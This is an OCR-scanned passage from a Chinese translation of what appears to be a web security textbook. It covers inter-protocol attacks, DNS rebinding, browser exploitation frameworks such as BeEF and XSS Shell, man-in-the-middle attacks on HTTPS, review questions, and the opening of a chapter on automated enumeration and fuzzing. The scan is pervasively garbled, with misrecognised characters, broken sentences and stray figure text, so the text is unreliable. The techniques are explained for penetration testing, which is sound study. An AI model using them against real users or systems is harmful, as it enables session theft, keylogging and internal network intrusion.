除 针 对 Web 服 务 如 实施 攻击 外 ， 有 些 情 况 下 还 可 以 利用 用 户 的 浏览 剖 、 针 对 可 以 从 用 户 的 计 
算 机 访问 的 非 HTTP 服 务实 施 攻击 。 只 有 所 攻击 的 服务 接受 必然 会 在 每 个 请 求 的 开头 出 现 的 HITP 
消息 头 ， 攻 击 者 就 可 以 在 消息 主体 中 发 送 任意 二 进 制 内 容 ， 从 而 与 非 HTTP 服 务 进行 交互 。 实 际 
上 ,许多 网 络 服务 都 接受 无 法 识别 的 输入 ， 并 仍然 处 理 随后 针对 相关 协议 而 构造 的 输入 。 

我 们 已 在 第 12 革 介绍 了 一 种 跨 域 发 送 任 童 消息 主体 的 技巧 ， 该 技巧 使 用 HTML 表 单 (其 
enctype 属 性 设置 为 Lext/plain ) 回 多 受 攻击 的 应 用 程序 发 送 XML 内 容 。 下 面 的 论文 介绍 了 实 
施 这 类 攻击 的 其 他 技巧 : 

www.ngssoftware.com/research/papers/InterProtocolExploitation.pdf 

这 类 协议 间 攻 击 可 对 日 标 服 务实 施 未 授权 操作 , 或 利用 该 服务 内 的 代码 级 漏洞 来 攻破 目标 服 

此 外 , 在 某 些 情况 下 , 还 可 以 对 非 HTTP 服 务 行为 加 以 利用 , 针对 在 同一 服务 大 上 运行 的 Web 
应 用 程序 实施 XSS 攻 击 。 要 实施 这 种 攻击 ， 必 须 满足 以 下 条 件 。 
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口 非 HTTP 服 务必 须 在 未 被 浏览 硕 阻 止 的 关口 上 运行 〈 如 前 所 述 )。 
口 非 HTTP 必 须 接 受 浏 览 厚 发 送 的 意外 HTTP 消 息 头 ， 而 不 仅仅 是 在 出 现 这 种 情况 时 关闭 网 
络 连接 。 许 多 服务 都 接受 意外 HTTP 消 息 头 ， 特 别 是 那些 基于 文本 的 服务 。 
口 非 HTTP 服 务必 须 在 其 啊 应 中 《如 在 错误 消息 中 ) 回 显 一 部 分 请 求 内 容 。 
口 浏览 需 必 须 接受 不 包含 有 效 HITP 消 息 头 的 啊 应 ， 并 且 必 须 将 一 部 分 啊 应 作为 HTML 处 理 
《如果 啊 应 中 包含 HTML )。 实 际 上 ， 在 收 到 合适 的 非 HTTP 啊 应 时 ， 所 有 最 新 版 本 的 浏览 
佑 部 以 这 种 方式 进行 处 理 ( 可 能 是 为 了 癌 后 兼容 )。 
口 在 隔离 域 源 访 问 cookie 时 ， 浏 览 硕 必须 忽略 端口 号 。 确 实 ， 在 处 理 cookie 时 ， 当 前 浏览 亏 
会 忽略 端口 。 
如 果 满 足 这 些 条 件 ， 攻 击 者 就 可 以 构建 针对 非 HTTP 服 务 的 XSS 攻 击 。 要 实施 这 种 攻击 ， 需 
要 以 正常 方式 在 URL 或 消息 主体 中 发 送 专 门 设计 的 请 求 。 然 后 ,请 求 中 包含 的 脚本 代码 将 被 回 显 ， 
并 在 用 户 的 浏览 大 中 执行 。 该 代码 可 以 从 非 HTTP 服 务 所 在 的 域 中 读 取 用 户 的 cookie, 然后 将 这 些 
cookie 传 送 给 攻击 者 。 


























13.7.7 利用 浏览 器 漏洞 


如 采用 户 的 浏览 硕 或 任何 安 闻 的 扩展 存在 漏洞 ， 攻 击 者 就 可 以 通过 恶意 JavaScript 或 HIML 
代码 利用 这 些 漏洞 。 某 些 情 况 下 ， 攻 击 者 可 以 利用 Java 虚 拟 机 之 类 的 扩展 中 的 漏洞 、 与 本 地 计算 
机 或 其 他 位 置 上 的 非 HITP 服 务 进 行 双 回 二 进 制 通信 。 这 样 ， 攻 击 者 就 可 以 利用 通过 端口 扫 摘 确 
定 的 存在 于 其 他 服务 中 的 漏洞 。 许 多 软件 产品 (包括 并 非 基于 浏览 硕 的 产品 ) 还 安装 了 可 能 包含 
漏洞 的 ActiveX 控 件 。 














13.7.8 DNS 重新 绑 定 


DNS 重新 绑 定 (DNS rebinding ) 是 一 种 在 某 些 情况 下 可 部 分 违反 同 源 策略 ， 从 而 允许 恶意 
Web 站 点 与 其 他 域 进行 交互 的 技术 。 之 所 以 能 够 实施 这 种 攻击 ， 是 因为 同 源 案 略 主要 基于 域名 进 
行 隔 离 ， 而 最 终 传 送 HTTP 请 求 则 需要 将 域名 转换 为 IP 地 址 。 

整体 看 来 ， 这 种 攻击 的 过 程 如 下 。 

口 用 户 访问 攻击 者 域 上 的 恶意 Web 页 面 。 为 检索 此 页 面 ,用户 的 浏览 器 会 将 攻击 者 的 域名 解 
析 为 攻击 者 的 耳 地 址 。 

口 攻击 者 的 Web 页 面向 攻击 者 的 域 提出 Ajax 请 求 ( 同 源 策略 允许 这 种 行为 ) 攻击 者 利用 DNS 
重新 绑 定 确保 浏览 三 再 次 解析 攻击 者 的 域 ， 在 这 次 解析 过 程 中 ， 域 名 将 解析 为 攻击 者 所 
针对 的 第 三 方 应 用 程序 的 IP 地 址 。 

口 随后 针对 攻击 者 的 域名 提出 的 请 求 将 被 发 送 到 目标 应 用 程序 。 由 于 这 些 请 求 与 攻击 者 的 
原始 页 面 在 同一 个 域 上 ， 因 此 ， 同 源 策 略 允 许 攻击 者 的 代码 检索 目标 应 用 程序 返回 的 请 
求 的 内 容 ， 并 将 这 些 内 容 返 还 给 攻击 者 ( 可 能 位 于 受 其 控制 的 其 他 域 上 )。 

实施 这 种 攻击 将 面临 各 种 阻碍 ,包括 一 些 浏览 带 为 继续 使 用 以 前 解析 的 IP 地 址 ( 即使 域 已 被 
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重新 绑 定 到 其 他 地 址 ) 而 采用 的 机 制 。 此 外 ， 浏览 帮 发 送 的 Host 消 息 头 仍然 会 引用 攻击 者 的 域 ， 
而 不 是 可 能 会 导致 问题 的 目标 应 用 程序 的 域 。 之 前 , 攻击 者 可 以 利用 一 些 方法 在 各 种 浏览 磅 上 突 
破 这 些 阻 信 。 除 浏览 硕 外 ， 还 可 以 针对 训 览 融 扩 展 和 Web 代 理 实 施 DNS 重 新 绑 定 攻击 ， 不 过 浏览 
俗 扩 展 和 Web 代 理 的 运行 机 制 可 能 会 有 所 不 同 。 

请 注意 , 在 DNS 重新 绑 定 攻击 中 ， 就 浏览 需 而 言 ， 针 对 目标 应 用 程序 的 请 求 仍然 在 攻击 者 的 
域 中 提出 。 因 此 ， 这 些 请 求 中 不 会 包含 目标 应 用 程序 所 在 的 域 的 任何 cookie。 为 此 ， 攻 击 者 可 以 
通过 DNS 重新 绑 定 从 目标 应 用 程序 检索 到 的 内 容 , 己任 何 可 以 二 接 回 目标 应 用 程序 提出 请 求 的 用 
户 能 够 检索 到 的 内 容 相同 。 因 此 , 这 种 技 马 在 目标 应 用 程序 已 实施 了 其 他 控制 来 防止 攻击 者 二 接 
与 其 进行 交互 的 情况 下 尤其 有 用 。 例 如 ,如果 用 户 处 在 无 法 通过 互联 网 直接 访问 的 组 织 内 部 网 络 
中 ， 攻 击 者 可 以 诱 使 该 用 户 从 所 在 网 络 的 其 他 系统 中 检索 内 容 ， 并 将 这 些 内 容 传 送 给 攻击 者 。 









































13.7.9 ”浏览 器 利用 框架 


人 们 已 开发 出 各 种 框架 , 用 以 演示 和 利用 各 种 针对 因特网 终 问 用 户 的 攻击 。 这 些 框 架 通 常 需 
要 通过 某 种 漏洞 ( 如 XSS )， 在 受害 者 的 浏览 硕 中 放 和 一 个 JavaScript 钩 了 于 (hook )。 放 置 钩子 后 ， 
浏览 需 就 会 与 攻击 者 控制 的 服务 咒 建 立 联 系 。 浏 览 需 会 定期 访问 这 个 服务 融 , 回 攻 击 者 提交 数据 ， 
同时 提供 一 个 控制 信道 ， 方 便 接收 攻击 者 发 出 的 命令 。 














注解 尽管 同 源 策略 实施 了 各 种 限制 ， 但 在 这 种 情况 下 ， 攻 击 者 仍然 可 以 利用 各 种 技 
巧 、 通 过 已 注入 到 目标 应 用 程序 中 的 脚本 与 其 控制 的 服务 器 进行 双向 弄 步 交互 。 一 种 


简单 的 方法 是 对 自己 的 域 实施 动态 跨 域 脚 本 包含 。 这 些 请 求 能 够 向 攻击 者 提交 截获 的 
数据 ( 在 URL 查 询 字 符 串 中 ), 并 接收 有 关 应 执行 的 操作 的 指令 ( 在 返回 的 脚本 代码 中 )。 








以 下 是 可 以 在 这 种 类 型 的 框架 中 执行 的 一 些 操作 : 

口 记录 键 击 并 向 攻击 者 发 送 这 些 内 容 ; 

口 支持 用 户 访问 易 受 攻击 的 应 用 程序 的 会 话 ; 

口 “指纹 ”识别 受害 者 的 浏览 副 ， 从 而 利用 已 知 的 浏览 可 漏洞 ; 

口 对 其 他 主机 《位 于 被 攻破 的 用 户 浏 览 可 能 够 访问 的 私有 网 络 中 ) 进行 闪 口 扫 摘 ， 并 回 攻 




















击 者 传送 扫 撞 结 
口 通过 迫使 浏览 可 发 送 了 恶意 请 求 , 可 对 借助 被 攻破 的 用 户 浏览 锅 访 问 的 其 他 Web 应 用 程序 实 
施 攻击 ; 


口 对 用 户 的 浏览 历史 记录 实施 蛋 力 攻击 ， 并 将 结 来 送 交 给 攻击 者 。 

BeEF 是 一 个 典型 的 综合 型 浏览 带 利 用 框 淋 , 它 由 Wade Alcon 开 发 ,能 够 执行 上 述 功能 ,图 13-8 
说 明了 BeEF 如 何 截 取 一 名 被 攻 破 用 户 的 信息 ， 包 括 计算 机 的 相关 资料 、 当 前 显示 的 URL 与 页 面 
内 容 ， 以 及 用 户 输 入 的 键 击 。 
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后 纪 10.82.53.41 


Details 

Browser 

Internet Explorer 5.01 

Operating System 

Windows 98 

Screen 

1280x800 wrth 24-br colour 

URL 
http://localhost/beef/hook/xss-example.htm 
Cookie 
BeEFSession=99f42a3792c31c94f85387a4d360a618 


Page Content 
Content 
The main Page more cortert 


Key Logger 
Keys 
my keys are logged 


Module Results 


Results 
OK Clicked 


图 13-8 ”利用 BeEF 从 一 名 被 攻破 的 用 户 截 取 的 数据 
图 13-9 显 示 BeEF 正 对 受害 用 户 的 计算 机 进行 端口 扫描 。 
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图 13-9 ”BeEF 正 对 一 名 被 攻破 的 用 户 计算 机 进行 端口 扫描 


XSS Shell 是 男 外 一 个 功能 非常 强大 的 浏览 帮 利 用 框 染 ， 它 由 Ferrruh Mavituna 开 发 。 这 个 框 
架 提 供 一 系列 功能 ， 可 控制 通过 XSS 攻 破 的 从 尸 主机 ( zombie host )， 包 括 截 获 键 击 、 i 
容 、 鼠 标 移 动 、 屏 幕 截 图 、UREL 历 史记 录 ， 以 及 注入 任意 JavaScript 命 令 。 即 使 导航 到 应 用 程序 的 
其 他 页 面 ， 它 还 会 驻 留 在 用 户 的 训 览 硕 中 。 


13.7.10 ”中间人 攻击 


我 们 在 前 几 章 中 讲 到 ， 如 果 应 用 程序 使 用 未 加 密 HTTP 通 信 ， 则 位 于 适当 位 置 的 攻击 者 可 以 
通过 各 种 方式 拦截 敏感 数据 ， 如 密码 和 会 话 令 牌 。 更 令 人 惊奇 的 是 ， 即 使 应 用 程序 使 用 HTTPS 
传输 所 有 敏感 数据 , 并 且 目 标 用 户 始终 验证 是 否 正确 使 用 了 HTTPS, 攻击 者 仍然 能 够 实施 一 些 严 
重 的 攻击 。 
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这 类 攻击 称 为 “中 间 人 ”攻击 。 这 类 攻击 者 不 只 是 被 动 监视 其 他 用 户 的 流量 ,而 且 会 动态 更 
改 某 些 流量 。 这 类 攻击 往往 更 加 复杂 , 但 确实 可 以 在 各 种 第 见 的 情形 ( 包括 无 线 公 共 热 点 和 共 至 


的 办 公 网 络 ) 中 实施 。 

许多 应 用 程序 使 用 HTTP 传 输 非 敏感 数据 ， 如 产品 说 明和 帮助 页 面 。 如 果 这 些 内 容 使 用 绝对 
URL 实 现任 何 脚本 包含 ， 攻 击 者 就 可 以 利用 主动 中 间 人 攻击 攻破 同一 域 上 受 HITPS 保 护 的 请 求 。 
例如 ， 某 应 用 程序 的 帮助 页 面 可 能 包含 以 下 代码 : 

<Script src="http://wahh-app.com/help.js"></script> 

目前 , 许多 知名 Web 应 用 程序 都 采用 这 种 行为 ， 即 使 用 绝对 URL 包 含 通 过 HTTP 传 送 的 脚本 。 
在 这 种 情况 下 ， 活跃 的 中 间 人 攻击 者 当然 可 以 通过 修改 任何 HTTP 响 应 来 执行 任意 脚本 代码 。 但 
是 ， 由 于 同 源 策略 通常 会 将 通过 HTTP 和 HTTPS 加 载 的 内 容 视 为 属于 不 同 来 源 ， 攻 击 者 并 不 能 利 
用 这 种 攻击 截获 使 用 HTTPS 访 问 的 内 容 。 

为 克服 这 种 障碍 ， 攻 击 者 可 以 通过 修改 任何 HTTP 响 应 来 构建 重 定向 ， 或 在 其 他 响应 中 重 写 
链接 目标 ， 从 而 户 使 用 户 通 过 HTTPS 加 载 同 一 页 面 。 当 用 户 通 过 HTTPS 加 载 帮助 页 面 时 ， 其 浏览 
器 将 使 用 HTTP 执 行 指定 的 脚本 包含 。 令 人 遗 憾 的 是 ， 一 些 浏览 器 在 这 种 情况 下 并 不 显示 任何 警 
告 。 然 后 ， 攻 击 者 可 以 在 包含 脚本 的 响应 中 返回 任意 脚本 代码 。 该 脚本 将 在 HTTPS 响 应 中 执行 ， 
允许 攻击 者 截获 通过 HTTPS 访 问 的 所 有 内 容 。 

即使 所 攻击 的 应 用 程序 并 不 使 用 普通 HTTP 传 送 任何 内 容 ， 但 攻击 者 仍然 可 以 通过 向 任何 其 
他 域 提 出 HTTP 请 求 来 返回 重 定向 ， 从 而 诱 使 用 户 使 用 普通 HTTP 回 目标 域 提 出 请 求 。 虽 然 应 用 程 
序 本 身 可 能 不 会 监听 端口 80 上 的 HTTP 请 求 ， 但 攻击 者 可 以 拦截 这 些 诱发 的 请 求 ， 并 在 这 些 请 求 
的 啊 应 中 返回 任意 内 容 。 在 这 种 情况 下， 攻击 者 可 以 采用 各 种 技巧 来 攻击 应 用 程序 域 的 HTTPS 

口 首先 ， 如 介绍 cookie 劫 持 攻 击 时 所 述 ， 攻 击 者 可 以 使 用 通过 普通 HTTP 传送 的 啊 应 来 设置 

或 更 新 HTTPS 请 求 使 用 的 cookie 值 。 即 使 cookie 最 初 通过 HTTPS 设 置 并 被 标记 为 安全 ， 攻 
击 者 仍然 可 以 这 样 做 。 如果 有 任何 cookie 值 由 在 HTTPS 来 源 中 运行 的 脚本 代码 以 危险 的 方 
式 进行 处 理 ， 攻 击 者 就 可 以 利用 cookie 注 入 攻击 、 通 过 该 cookie 来 实施 XSS 攻 击 。 

口 其 次 , 我 们 在 前 面 讲 到 , 一些 浏览 姨 扩 展 并 不 能 正确 隔离 通过 HTTP 和 HTTPS 加 载 的 内 容 ， 

并 将 这 些 内 容 视 为 属于 同一 来 源 。 这 时 , 攻击 者 的 脚本 ( 由 诱发 的 HTTP 请 求 的 啊 应 返回 ) 
就 可 以 利用 此 类 扩展 来 读 取 或 瑟 人 用 户 使 用 HTTPS 访 问 的 页 面 的 内 容 。 

要 实施 上 述 攻 击 ， 需 要 通过 某 种 方法 ， 如 从 用 户 癌 任何 其 他 域 提出 的 HTTP 请 求 返 回 重 定 问 
响应 ， 诱 使 用 户 向 目标 域 提 出 任意 HTTP 请 求 。 你 可 能 认为 极为 注重 安全 的 用 户 并 不 会 受到 上 述 
攻击 。 假 设 用 户 一 次 仅 访问 一 个 Web 站 点 ， 并 在 访问 每 个 新 站 点 之 前 重新 启动 浏览 器 。 假 设 他 使 
用 全 新 的 浏览 器 登录 自己 的 银行 应 用 程序 , 并 且 该 程序 仅 使 用 HTTPS 传 输 数 据 。 他 是 否 会 受到 中 
间 人 攻击 呢 ? 

令 人 担心 的 是 答案 是 肯定 的 ,他 可 能 会 受到 攻击 ,今天 的 浏览 器 会 在 后 台 提 出 各 种 普通 HTTP 
请 求 ， 而 不 论 用 户 访 问 哪 一 个 域 。 常见 的 例子 包括 反 钓鱼 列表 、 版 本 ping 以 及 针对 RSS 源 的 请 求 。 
这 时 ， 攻 击 者 可 以 通过 HTTP， 用 指向 目标 域 的 重 定向 来 响应 其 中 的 任何 请 求 。 如 果 浏 览 絮 直接 
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访问 该 重 定 回 ， 攻 击 者 就 可 以 实施 上 述 某 种 攻击 ， 首 先 攻 破 目标 域 的 HTTP 来 源 ， 然 后 将 攻击 扩 
展 到 HTTPS 来 源 。 

注重 安全 的 用 户 如 果 需 要 通过 不 可 信 网 络 访问 受 HTTPS 保 护 的 敏感 内 容 , 可 以 将 浏览 器 的 代 
理 配 置 设 置 为 “对 除 HITTPS 以 外 的 所 有 协议 使 用 无 效 的 本 地 端口 ” ， 从 而 在 一 定 程度 上 阻止 上 述 
攻击 。 即 使 这 样 做 ， 他 们 仍然 需要 当心 针对 SSL 的 主动 攻击 (该 主题 不 属于 本 书 的 讨论 范围 )。 




















13.8 小结 


我 们 已 经 分 析 了 各 种 情形 , 说明 了 Web 应 用 程序 中 存在 的 漏洞 是 如 何 令 它 的 用 户 遭 受 恶 意 攻 
击 的 。 许 多 这 种 源 洞 都 非 第 难以 理解 和 发 现 ， 而 且 在 这 个 过 程 中 往往 需要 进行 大 量 的 调查 ,为 此 
付出 的 努力 超出 了 它们 作为 某 个 重要 攻击 的 前 提 的 实际 音义 。 然 而, 严重 的 漏洞 稼 篆 隐 藏 在 大 量 
无 天 么 要 的 客户 痪 缺陷 之 中 ,而 攻击 者 则 可 以 利用 这 类 漏洞 对 应 用 程序 实施 攻击 。 因 此 , 许多 时 
候 ， 付 出 这 样 的 努力 还 是 值得 的 。 

而 且 ， 随 着 人 们 对 Web 应 用 程序 安全 意识 的 逐渐 增强 ， 百 接 针 对 服务 大 组 件 的 攻击 可 能 更 难 
以 发 现 或 实施 。 但 是 ， 针 对 其 他 用 户 的 攻击 ,无 论 其 结 采 好 坏 ， 肯 是 会 成 为 每 个 人 将 来 必须 面 对 
的 问题 。 












































13.9 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.net/wahh 。 
(1) 已 知 一 项 应 用 程序 功能 将 一 个 查询 字符 串 参 数 的 内 容 插 入 到 某 个 HTTP 重 定 问 的 
Location 消 息 头 中 。 利 用 这 种 行为 ， 攻 击 者 可 以 实施 哪 3 种 不 同类 型 的 攻击 ? 
(2) 要 针对 应 用 程序 的 一 项 敏感 功能 实施 CSRF 攻 击 ， 必 须 满足 什么 前 提 条 件 ? 
(3) 哪 3 种 防御 措施 可 用 于 防止 JSON 支 持 攻 击 ? 
(4) 对 于 以 下 每 一 种 技术 ， 确 是 该 技术 请 求 /crossdomain.xml 下 确实 施 域 隔离 的 任何 情形 : 
(a) Flash 
(b) Java 
(ce) HTML5 
(d) Silverlight 
(5)“ 我 们 不 会 受到 单 击 动 持 攻击 ， 因 为 我 们 不 使 用 框架 。” 以 上 表述 是 否 正 确 ， 为 什么 ? 
(6) 已 知 在 某 应 用 程序 使 用 的 昵称 中 存在 一 个 永久 性 XSS 漏 洞 。 此 字符 串 仅 在 配置 它 的 用 户 
登录 应 用 程序 时 问 该 用 户 显 示 。 请 描述 用 于 攻破 该 应 用 程序 的 其 他 用 户 的 攻击 所 需 执行 的 步骤 。 
(7) 如 何 测 试 应 用 程序 是 否 允 许 使 用 XMLHttpRequest 提 出 跨 域 请 求 ? 
(8) 请 描述 攻击 者 可 诱 使 受害 者 使 用 任意 cookie 的 3 种 方法 。 


















































定制 攻击 目 动 化 











草 不 再 介绍 任何 新 的 漏洞 ， 而 是 分 析 癌 Web 应 用 程序 实施 攻击 的 一 个 关键 问题 
如 何 使 用 上 日 动 控 制 加 强 并 促进 定制 攻击 。 我 们 所 讨论 的 技巧 可 用 于 整个 应 用 程序 以 及 
攻击 过 程 的 每 一 个 阶段 ， 包 括 最 初 的 解析 过 程 到 实际 的 应 用 。 
每 一 个 Web 应 用 程序 部 各 不 相同 。 渗透 测试 员 需 要 使 用 各 种 手动 操作 与 技巧 向 应 用 程序 实施 
有 效 攻 击 ， 以 理解 它 的 行为 ,并 探查 其 中 存在 的 漏洞 。 同 时 还 必须 发 挥 想象 ， 利 用 日 己 的 经 验 与 
沉 。 通 第 ,测试 员 应 当 根 据 已 经 确定 的 特殊 行为 ,以 及 应 用 程序 允许 与 其 交互 并 对 其 进行 控制 
的 特定 情形 ,实施 本 质 上 定制 或 日 定义 的 攻击 。 手动 实施 定制 可 能 极其 费力 ,而 且 容 易 出 错 。 为 
此 , 最 成 功 的 Web 应 用 程序 墨客 往往 会 努力 简化 他 们 的 定制 攻击 , 设法 将 其 目 动 化 , 使 其 更 简单 、 
快捷 、 高 效 。 
本 章 将 讨论 一 种 实现 定制 攻击 目 动 控制 的 公认 方法 。 这 种 方法 结合 了 人 类 智 意 及 计算 机 覃 力 
的 优点 ， 沼 第 会 造成 破坏 性 的 后 果 。 本 章 还 将 介绍 使 用 日 动 化 技巧 时 过 到 的 各 种 障碍 ,以 及 避 开 
这 些 障 碍 的 方法 。 


14.1 ”应 用 定制 自动 化 攻击 


在 以 下 3 种 情况 下 ， 和 定制 目 动 化 攻击 技巧 有 助 于 渗透 测试 员 癌 Web 应 用 程序 实施 攻击 。 

口 枚 举 标 识 符 。 大 多 数 应 用 程序 使 用 各 种 名 称 与 标识 符 指 代数 据 和 资源 ， 如 账号 、 用 户 名 
和 文档 ID。 测 试 员 需 要 经 党 浏览 数 日 庞大 的 潜在 标识 从 ， 才 能 枚 人 举 出 那些 有 效 或 值得 进 
一 步 研 究 的 标识 符 。 在 这 种 情况 下 ， 可 以 使 用 完全 定制 的 日 动 技 巧 来 分 析 一 组 可 能 的 标 
识 符 ， 或 者 志 历 应 用 程序 所 使 用 的 标识 符 的 语法 范围 。 

使 用 页 码 参数 获取 特殊 内 容 的 应 用 程序 就 是 一 个 典型 的 示例 : 

http://mdsec.net/app/ShowPage.ashx?PageNo=10063 

在 浏览 应 用 程序 的 过 程 中 ,会 发 现 大量 有 效 的 PageNo 值 ; 但 是 ， 要 确定 每 一 个 有 效 
值 ， 必 须 循 环 碍 找 整个 语法 范围 ， 而 手动 操作 根本 无 法 做 到 这 一 点 。 

口 获取 数据 。 通 过 提出 专门 设计 的 特 丈 请求, 利用 各 种 Web 应 用 程序 漏洞 ,测试 员 就 可 以 从 
应 用 程序 中 提取 到 有 用 的 或 敏感 的 数据 。 例 如 ， 个 人 资料 页 面 可 能 会 显示 当前 用 户 的 个 
人 与 银行 交易 信息 ， 并 指出 该 用 户 在 应 用 程序 中 的 权限 。 通 过 一 个 访问 控制 漏洞 ， 就 可 
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以 查看 任何 用 户 的 个 人 资料 页 面 ， 但 一 次 只 能 获得 一 名 用 户 的 资料 。 要 获得 所 有 用 户 的 
资料 ， 可 能 需要 提交 成 千 上 万 个 请 求 。 这 时 ， 就 可 以 使 用 一 个 目 动 化 定制 攻击 截获 所 有 
数据 ， 而 不 是 进行 手动 操作 。 

获取 有 用 数据 的 一 个 示例 是 对 前 面 描述 过 的 枚 举 攻击 的 扩展 。 这 时 不 必 确 认 到 底 哪 
些 PageNo 值 为 有 效 值 ; 相反 ， 可 以 利用 自动 化 攻击 来 从 获得 的 每 个 页 面 中 提取 出 HTML 
标题 标签 (title tag ) 的 内 容 ， 迅 速 扫描 所 有 页 面 ， 查 找 有 用 的 数据 。 

口 Web 应 用 程序 模糊 测试 。 当 描述 探查 常见 Web 应 用 程序 漏洞 时 , 能够 见 到 大 量 的 示例 , 在 
这 些 示 例 中 ， 探 查 漏 洞 的 最 佳 方法 是 提交 各 种 反 负 的 数据 和 攻击 字符 串 ， 然 后 检查 应 用 
程序 的 啊 应 ， 查 找 任何 表示 可 能 存在 漏洞 的 异常 现象 。 在 大 型 应 用 程序 中 ， 在 进行 初步 
解析 过 程 中 ,已 经 确定 一 些 需 要 探查 的 特殊 请 求 ， 每 个 请 求 都 包含 各 种 不 同 的 参数 。 手 
动 检查 每 一 个 参数 既 费 时 又 费力 ， 而 且 可 能 会 忽略 大 部 分 受 攻击 面 。 但 是 ,使 用 定制 自 
动 攻击 技巧 ， 就 可 以 立即 生成 大 量 包 含 党 用 攻击 字符 串 的 请 求 ， 迅 速 访问 服务 天 的 啊 应 ， 
找到 所 有 值得 进一步 研究 的 参数 。 这 种 技巧 常 被 称 为 模糊 测试 ( fuzzing )。 

我 们 将 详细 讨论 这 三 种 情形 ， 并 说 明 如 何 利 用 定制 自动 攻击 技巧 显 车 提高 攻击 效率 。 


14.2 ” 枚 举 有 效 的 标识 和 位 


在 摘 述 各 种 常见 漏洞 与 攻击 技巧 的 过 程 中 , 我 们 提 到 , 应 用 程序 经 党 使 用 名 称 或 标识 符 指 代 
各 种 数据 ; 渗透 测试 员 的 任务 是 查 明 它 使 用 的 部 分 或 全 部 有 效 的 标 误 符 。 以 下 是 一 些 需 要 枚 淮山 
标识 符 的 情况 。 

口 应 用 程序 的 登录 功能 返回 详尽 的 错误 消息 ， 指 出 登录 失败 是 因为 用 户 名 不 存在 或 密码 错 

误 。 在 这 种 情况 下 ， 可 以 过 历 一 组 种 见 的 用 户 名 ， 并 答 试 用 每 一 个 用 户 名 登录 ， 从 而 将 
攻击 范围 缩小 至 那些 已 知 有 效 的 用 户 名 。 人 然后 测试 员 就 可 以 使 用 得 到 的 用 户 名 列表 ， 实 
施 密 码 猜 测 攻 击 。 

口 许多 应 用 程序 使 用 标识 符 指 代 应 用 程序 处 理 的 各 种 资源 ， 如 文档 ID、 账 号 、 雇 员 号 码 和 
日 志 记 录 。 通 种 ， 应 用 程序 会 泄露 一 些 确 定 特殊 标识 符 是 否 有 效 的 方法 。 因 此 ， 过 有 历 应 
用 程序 使 用 的 标识 符 的 语法 范围 就 可 以 获得 所 有 这 些 贷 源 。 

口 如 果 应 用 程序 生成 的 会 话 令 牌 可 以 预测 ， 那 么 ， 以 应 用 程序 发 布 的 一 些 令 牌 为 基础 进行 
推 上 新， 就 可 以 支持 其 他 用 户 的 令 牌 。 根 据 这 个 过 程 的 准确 程度 ， 可 能 需要 测试 大 量 令 牌 
才能 确定 每 一 个 有 效 的 值 。 





























































































































14.2.1 基本 步骤 


设计 一 个 枚 举 有 效 标识 符 的 定制 自动 攻击 的 第 一 步 是 查找 一 个 具有 以 下 特点 的 请 求 /响应 对 。 

口 请 求 的 参数 中 包含 所 针对 的 标识 符 。 例 如 ， 在 一 个 显示 应 用 程序 页 面 的 功能 中 ， 请 求 中 
可 能 包含 参数 PageNo= 10069。 

口 当 改 变 这 个 参数 的 值 时 ， 服 务 硕 对 这 个 请 求 的 啊 应 也 会 发 生 相 应 变化 。 例 如 ， 如 采 请 求 
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-个 有 效 的 PageNo, 服务 表 可 能 返回 一 个 包含 指定 文档 内 容 的 啊 应 。 如 朱 请 求 一 个 无 效 
的 值 ， 它 可 能 会 返回 一 个 稼 见 的 错误 消息 。 
确定 一 个 适当 的 请 求 / 啊 应 对 后 ， 接 下 来 应 癌 应 用 程序 提交 大 量 上 自动 请 求 ， 循 环 浏览 所 有 潜 
在 的 标识 符 ， 或 者 遍历 已 知 应 用 程序 使 用 的 标识 符 的 语法 范围 。 然 后 , 监控 应 用 程序 对 这 些 请 求 
的 啊 应 ， 查 找 表 示 提 交 有 效 标识 和 的 “ 触 点 ”。 























14.2.2 探测 “ 触 点 ” 


改变 请 求 中 的 参数 值 后 , 啊 应 的 许多 特征 会 发 生 系统 性 的 改变 ,它们 是 实施 自动 攻击 的 基础 。 

1. HTTP 状 态 码 

根据 请 求 提 交 的 参数 值 , 许多 应 用 程序 系统 性 地 返回 各 种 不 同 的 状态 码 。 在 榴 举 标识 符 的 攻 
击 中 ， 最 常见 的 状态 人 码 包括 以 下 几 种 。 

口 200， 默 认 状 态 码 ， 表 示 请 求 成 功 提 交 。 

口 301 或 302， 重 定 问 到 为 外 一 个 URL。 

口 401 或 403， 请求 未 区 授权 或 被 禁止 。 

口 404， 被 请 求 的 资源 未 发 现 。 

口 500， 服 务 需 在 处 理 请 求 时 遇 到 错误 。 

2. 响应 长 度 

应 用 程序 中 的 动态 页 面 常 常 使 用 一 个 页 面 模板 建立 啊 应 ( 其 长 度 固 定 )， 并 在 这 个 模板 中 插 
人 和 针对 每 个 啊 应 的 内 容 。 如 有 果 人 针对 每 个 啊 应 的 内 容 不 存在 或 无 效 (例如 ,请求 了 一 个 错误 的 文档 
ID )， 那 么 应 用 程序 就 会 返回 一 个 空白 响应 。 这 时 ， 响 应 长 度 就 是 证 明文 档 了 D 是 否 有 效 的 一 个 可 
靠 指 标 。 

在 其 他 情况 下 ， 啊 应 长 度 不 同 可 能 表示 发 生 错 误 或 存在 其 他 功能 。 根 据 我 们 的 经 验 , 在 绝 大 
多 数 情 况 下 ，HTTP 啊 应 码 与 啊 应 长 度 就 足以 确定 反 第 的 啊 应 。 

3. 响应 主体 

应 用 程序 返回 的 数据 中 常常 包含 可 用 于 探测 “ 触 点 ”的 字面 量 字 符 串 或 模式 。 例 如 ,如果 请 
求 一 个 无 效 的 文档 ID， 啊 应 中 可 能 包含 字符 串 Invaliq document ID。 有 时 ， 即 使 HTTP 啊 应 
码 没 有 变化 , 但 由 于 啊 应 中 包含 动态 内 容 ， 总 体 啊 应 长 度 会 发 生 改 变 。 因 此 , 在 啊 应 中 搜索 一 个 
特殊 的 字符 串 或 模式 可 能 是 确定 “ 触 点 ”的 最 佳 方法 。 

4. Location 消 息 头 

有 时 候 ， 应 用 程序 会 以 一 个 HTTP 重 定向 (状态 码 为 301 或 302 ) 啊 应 访问 某 个 特殊 URL 的 请 
求 ， 重 定 癌 的 目标 则 取决 于 在 请 求 中 提交 的 参数 。 例 如 ， 如 果 提 交 正 确 的 报告 名 称 ， 一 个 查看 报 
告 的 请 求 可 能 会 导致 一 个 目标 为 /daown1load . 可 sp 的 重 定 问 ; 否则 ， 重 定 问 就 指 问 /error. 可 SD 
HTTP 重 定 问 的 目标 在 Location 消 奶头 中 指定 ， 这 种 方法 同样 也 可 用 于 确定 “ 触 点 ”。 

5. Set-Cookie 消 息 头 

